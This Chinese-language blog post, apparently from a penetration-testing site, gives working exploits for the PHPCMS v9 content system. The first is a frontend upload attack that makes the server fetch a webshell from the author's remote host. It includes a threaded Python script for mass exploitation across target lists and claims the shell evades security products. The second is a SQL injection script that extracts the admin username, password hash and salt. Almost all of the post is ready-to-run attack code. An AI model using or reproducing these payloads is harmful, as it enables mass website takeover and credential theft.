phpcms前台getshell(附:注入)
首页 > web安全 > 渗透测试    作者:webbaozi   2017年4月10日 17:34 星期一   热度:3338°   百度已收录  
时间:2017-4-10 17:34   热度:3338° 

1.phpcms文件上传,需要网站开启注册功能

http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1

POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>&dosubmit=1&protocol=

代码如下(一句话过安全狗、过D盾):


#!/usr/bin/env python
#coding:utf-8
#data:20170410

'''
test:http://www.hfssw.com
usage:v9.py url.txt vul_url.txt
'''

import sys,pytz,urllib,urllib2,threading

def getshell(target):
        vuln_url = target + "/index.php?m=member&c=index&a=register&siteid=1"
        data = {
                "dosubmit":1,
                "modelid":11,
                "username":"hello12345",
                "password":"hello12345",
                "email":"[email protected]",
                "info[content]":"<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg"
        }
        try:
                req = urllib2.Request(vuln_url)
                data = urllib.urlencode(data)
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 
                response = opener.open(req, data)
                data_str = response.read()
        except:
                data_str = ""

        vul_url = data_str[data_str.find("src=http"):(data_str.find("src=http")+len(url)+67)]
        fw.write(vul_url+"\n")
        print vul_url+"\n"

if __name__ == "__main__":
        fw = open(sys.argv[2],"a")
        for url in open(sys.argv[1]).readlines():
                threading.Thread(target=getshell,args=(url.strip(),)).start()
                while 1:
                        if(len(threading.enumerate())<50):
                                break


2.phpcms注入(v9.6.0)

代码如下:


import requests,sys,urllib
url = sys.argv[1]
print 'Phpcms v9.6.0 SQLi Exploit Code By Luan'
sqli_prefix = '%*27an*d%20'
sqli_info = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'
sqli_password1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '
sqli_password2 = '_admin li*mit 0,1)x))'
sqli_padding = '%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6'
setp1 = url + '/index.php?m=wap&a=index&siteid=1'
cookies = {}
for c in requests.get(setp1).cookies:
	if c.name[-7:] == '_siteid':
		cookie_head = c.name[:6]
		cookies[cookie_head+'_userid'] = c.value
		cookies[c.name] = c.value

print '[+] Get Cookie : ' + str(cookies)
setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_info, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
	if c.name[-9:] == '_att_json':
		sqli_payload = c.value
print '[+] Get SQLi Payload : ' + sqli_payload
setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print '[+] Get SQLi Output : ' + html.split('luan$')[1]
table_prefix = html[html.find('_download_data')-2:html.find(	'_download_data')]
print '[+] Get Table Prefix : ' + table_prefix
setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_password1, safe='qwertyuiopasdfghjklzxcvbnm*') + table_prefix + urllib.quote_plus(sqli_password2, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
	if c.name[-9:] == '_att_json':
		sqli_payload = c.value
print '[+] Get SQLi Payload : ' + sqli_payload
setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print '[+] Get SQLi Output : ' + html.split('luan$')[1]



二维码加载中...
本文作者:webbaozi      文章标题: phpcms前台getshell(附:注入)
本文地址:http://www.webbaozi.com/stcs/60.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1